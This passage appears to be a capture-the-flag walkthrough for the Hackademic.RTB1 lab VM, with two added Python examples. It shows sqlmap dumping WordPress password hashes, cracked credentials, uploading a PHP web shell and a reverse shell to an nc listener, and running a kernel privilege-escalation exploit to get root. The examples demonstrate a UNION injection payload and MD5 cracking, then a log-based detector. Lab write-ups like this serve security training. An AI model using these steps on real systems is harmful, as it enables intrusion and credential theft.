> Once that has finished, open a new terminal and scan the network for the target's IP:
# netdiscover -i wlan0 -r 192.168.1.0/24
(wlan0 can be replaced with eth0; I am on a wireless network, so I use wlan0)
> The scan shows the target at 192.168.1.104. Paste that IP into your browser's URL bar.
> Click the Hackademic.RTB1 heading, then click Uncategorized just below it. Notice that the URL changes to http://192.168.1.104/Hackademic_RTB1/?cat=1, so the category ID is passed straight in as a query parameter.
> Copy that URL, open a terminal and point sqlmap at it to enumerate the databases (the URL is quoted so the shell does not treat the ? as a glob):
# sqlmap -u "http://192.168.1.104/Hackademic_RTB1/?cat=1" --dbs
(output)
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
# sqlmap -u "http://192.168.1.104/Hackademic_RTB1/?cat=1" -D wordpress --tables
(output)
Database: wordpress
[9 tables]
+-------------------+
| wp_categories |
| wp_comments |
| wp_linkcategories |
| wp_links |
| wp_options |
| wp_post2cat |
| wp_postmeta |
| wp_posts |
| wp_users |
+-------------------+
# sqlmap -u "http://192.168.1.104/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns
(output)
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
# sqlmap -u "http://192.168.1.104/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump
(output; user_pass holds unsalted MD5 hashes, and the values in parentheses are the passwords sqlmap recovered by running its built-in dictionary attack on them; JohnSmith's hash was not in its wordlist)
Database: wordpress
Table: wp_users
[6 entries]
+---------------------------------------------+--------------+
| user_pass | user_login |
+---------------------------------------------+--------------+
| 21232f297a57a5a743894a0e4a801fc3 (admin) | NickJames |
| 50484c19f1afdaf3841a0d821ed393d2 (kernel) | MaxBucky |
| 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3) | GeorgeMiller |
| 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell) | JasonKonnors |
| a6e514f9486b83cb53d8d932f9a04292 (napoleon) | TonyBlack |
| b986448f0bb9e5e124ca91d3d650f52c | JohnSmith |
+---------------------------------------------+--------------+
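The following is an added example, not part of the original walkthrough and not WordPress's or sqlmap's code. It reproduces in miniature what sqlmap did above: the bug class behind the injectable `?cat=1` (an integer parameter pasted into SQL text), a UNION payload that pulls `user_login` and `user_pass` out of `wp_users`, and a dictionary attack on the unsalted MD5 hashes that were dumped. SQLite stands in for MySQL, the `wp_categories`/`wp_users` schema, the two lookup functions and the wordlist are all constructed for illustration, and only the hashes and logins come from the dump above.

```python
"""Added example: SQL injection on an integer parameter plus MD5 dictionary
cracking, modelled on the ?cat=1 / wp_users dump shown on this page.
Schema, function names and wordlist are assumptions, not WordPress code."""
import hashlib
import sqlite3

# Constructed copy of the dumped rows: (user_login, unsalted MD5 of the password).
DUMPED_USERS = [
    ("NickJames",    "21232f297a57a5a743894a0e4a801fc3"),
    ("MaxBucky",     "50484c19f1afdaf3841a0d821ed393d2"),
    ("GeorgeMiller", "7cbb3252ba6b7e9c422fac5334d22054"),
    ("JasonKonnors", "8601f6e1028a8e8a966f6c33fcd9aec4"),
    ("TonyBlack",    "a6e514f9486b83cb53d8d932f9a04292"),
    ("JohnSmith",    "b986448f0bb9e5e124ca91d3d650f52c"),
]

# Small constructed wordlist standing in for sqlmap's dictionary.
WORDLIST = ["123456", "password", "admin", "kernel", "q1w2e3",
            "maxwell", "napoleon", "wordpress"]


def build_db():
    """In-memory stand-in for the 'wordpress' database seen in --dbs."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_categories (cat_ID INTEGER, cat_name TEXT);
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
        INSERT INTO wp_categories VALUES (1, 'Uncategorized');
    """)
    db.executemany("INSERT INTO wp_users VALUES (?, ?)", DUMPED_USERS)
    return db


def category_lookup_vulnerable(db, cat):
    """The bug class behind ?cat=1: the parameter is concatenated into the SQL
    text, so 'cat' can end the number and append a UNION that reads wp_users."""
    sql = "SELECT cat_ID, cat_name FROM wp_categories WHERE cat_ID = " + cat
    return db.execute(sql).fetchall()


def category_lookup_safe(db, cat):
    """The fix: cast to int (anything that is not a number raises ValueError)
    and bind the value as a parameter so it can never become SQL."""
    sql = "SELECT cat_ID, cat_name FROM wp_categories WHERE cat_ID = ?"
    return db.execute(sql, (int(cat),)).fetchall()


# Payload in the spirit of sqlmap's UNION technique used for --dump.
UNION_PAYLOAD = "1 UNION SELECT user_login, user_pass FROM wp_users"


def dump_via_injection(db):
    """Return the (user_login, user_pass) rows leaked through the UNION."""
    rows = category_lookup_vulnerable(db, UNION_PAYLOAD)
    # The legitimate row has an integer cat_ID; every string-keyed row is from wp_users.
    return [(login, pw) for login, pw in rows if isinstance(login, str)]


def crack_md5(hash_hex, wordlist=WORDLIST):
    """Dictionary attack on an unsalted MD5, which sqlmap runs automatically."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == hash_hex:
            return word
    return None


def crack_dump():
    """Inject, then crack: returns {user_login: password or None}."""
    db = build_db()
    return {login: crack_md5(pw) for login, pw in dump_via_injection(db)}


def safe_lookup_rejects_payload():
    """True if the parameterised lookup refuses the UNION payload."""
    try:
        category_lookup_safe(build_db(), UNION_PAYLOAD)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for login, pw in crack_dump().items():
        print(f"{login:<13} {pw if pw else '(not in wordlist)'}")
    print("safe lookup rejects payload:", safe_lookup_rejects_payload())
```

The point of the safe variant is that the fix is not escaping quotes: the parameter is numeric, so it is cast and bound, and the UNION can never reach the database. Any password that the wordlist does not contain stays `None`, which is exactly why JohnSmith's hash came back bare in the sqlmap table.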
========================================================================
Open the browser and go to the admin login page:
http://192.168.1.104/Hackademic_RTB1/wp-admin
Log in as GeorgeMiller with password q1w2e3; this is the administrator-level account, so it can change the upload settings.
In the dashboard go to Options > Miscellaneous, tick "Allow file uploads" and add php to the list of allowed file extensions.
Click Update Options.
======================================================
Click the Upload tab to upload the backdoor (download the backdoor files first).
1. Upload shell.php.
Note the URL it lands at: /Hackademic_RTB1/wp-content/shell.php
Open it in the browser: http://99.99.99.7/Hackademic_RTB1/wp-content/shell.php
(the target's address in this second part of the walkthrough is 99.99.99.7; use whatever IP netdiscover returned for you)
The web shell is displayed.
2. Upload bekonek.php (the reverse-shell script) into /var/www/html/Hackademic_RTB1/wp-content/, then edit it so that it connects back to your Kali Linux IP on port 443, the port the listener in the next step uses.
3. In a terminal on Kali, start the listener: nc -lvvp 443
4. Trigger bekonek.php from the browser:
http://99.99.99.7/Hackademic_RTB1/wp-content/bekonek.php
5. In the shell that arrives on the listener, check who you are and what kernel you are on:
whoami
id
uname -a
6. Upload exploit.c to wp-content. This is Dan Rosenberg's RDS socket exploit (CVE-2010-3904); it targets kernels from 2.6.30 up to 2.6.36-rc8 on which the rds module can be loaded, so compare the uname -a output against that range before relying on it. From the shell cd into /var/www/html/Hackademic_RTB1/wp-content and compile it (gcc must be present on the target):
sh-4.0$ gcc exploit.c -o sploit
A file named sploit appears.
7. Run it:
sh-4.0$ ./sploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
whoami
root
id
uid=0(root) gid=0(root)
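As an added example (not part of the original walkthrough), here is the defender's side of the same chain: a small detector run over constructed Apache combined-format log lines that mimic what the steps above leave behind on the target, namely sqlmap probing `?cat=`, an administrator POSTing to the upload handler, and a `.php` file appearing directly under `wp-content` and being requested. The log lines, the rule names, the `wp-admin/upload.php` path and the regexes are all assumptions made for illustration and are not taken from the VM.

```python
"""Added example: detecting the SQLi -> upload -> web shell chain from this
page in Apache access logs.  The sample log, paths and rule names are
constructed for illustration; they are not real logs from the target."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log (combined format), one attacker and one benign client.
SAMPLE_LOG = """\
192.168.1.10 - - [01/Jan/2011:10:00:01 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.10 - - [01/Jan/2011:10:00:02 +0000] "GET /Hackademic_RTB1/?cat=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
192.168.1.10 - - [01/Jan/2011:10:00:02 +0000] "GET /Hackademic_RTB1/?cat=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 5310 "-" "sqlmap/1.0-dev"
192.168.1.10 - - [01/Jan/2011:10:05:00 +0000] "POST /Hackademic_RTB1/wp-admin/options.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.10 - - [01/Jan/2011:10:05:30 +0000] "POST /Hackademic_RTB1/wp-admin/upload.php HTTP/1.1" 200 1803 "-" "Mozilla/5.0"
192.168.1.10 - - [01/Jan/2011:10:06:00 +0000] "GET /Hackademic_RTB1/wp-content/shell.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.1.10 - - [01/Jan/2011:10:07:00 +0000] "GET /Hackademic_RTB1/wp-content/bekonek.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.55 - - [01/Jan/2011:10:08:00 +0000] "GET /Hackademic_RTB1/wp-content/themes/default/style.css HTTP/1.1" 200 3999 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Crude SQL-injection markers in a decoded query string.
SQLI_RE = re.compile(
    r"\b(union\s+(all\s+)?select|and\s+\d+=\d+|or\s+\d+=\d+|sleep\(|benchmark\()", re.I)

# A .php file sitting directly in wp-content, where the old uploader wrote files;
# theme and plugin PHP lives in subdirectories and is deliberately not matched.
PHP_IN_WP_CONTENT_RE = re.compile(r"^/[^?]*?/wp-content/[^/?]+\.php(\?|$)", re.I)


def parse(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Scan log text and return (client_ip, rule, decoded_path) findings."""
    findings = []
    uploaded = set()  # clients that have POSTed to the upload handler
    for line in log_text.splitlines():
        e = parse(line)
        if not e:
            continue
        ip, path = e["ip"], unquote_plus(e["path"])
        if "sqlmap" in e["ua"].lower():
            findings.append((ip, "scanner_ua", path))
        if "?" in path and SQLI_RE.search(path.split("?", 1)[1]):
            findings.append((ip, "sqli_probe", path))
        if e["method"] == "POST" and path.endswith("/wp-admin/upload.php"):
            uploaded.add(ip)
        if PHP_IN_WP_CONTENT_RE.match(path):
            findings.append((ip, "php_in_wp_content", path))
            if ip in uploaded:  # upload followed by execution from the same client
                findings.append((ip, "upload_then_exec", path))
    return findings


def summarize(findings):
    """Collapse findings into {client_ip: {rule: count}}."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for ip, rule, _ in findings:
        per_ip[ip][rule] += 1
    return {ip: dict(rules) for ip, rules in per_ip.items()}


if __name__ == "__main__":
    for ip, rules in summarize(detect(SAMPLE_LOG)).items():
        print(ip, rules)
```

The scanner user-agent rule is the weakest of the four, since sqlmap's `--random-agent` removes it; the injection markers and the upload-then-execute sequence survive that, and the last rule is the one that would have caught this walkthrough even if the SQL injection had happened elsewhere.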
============================
Done. I hope this is useful.
=======================================================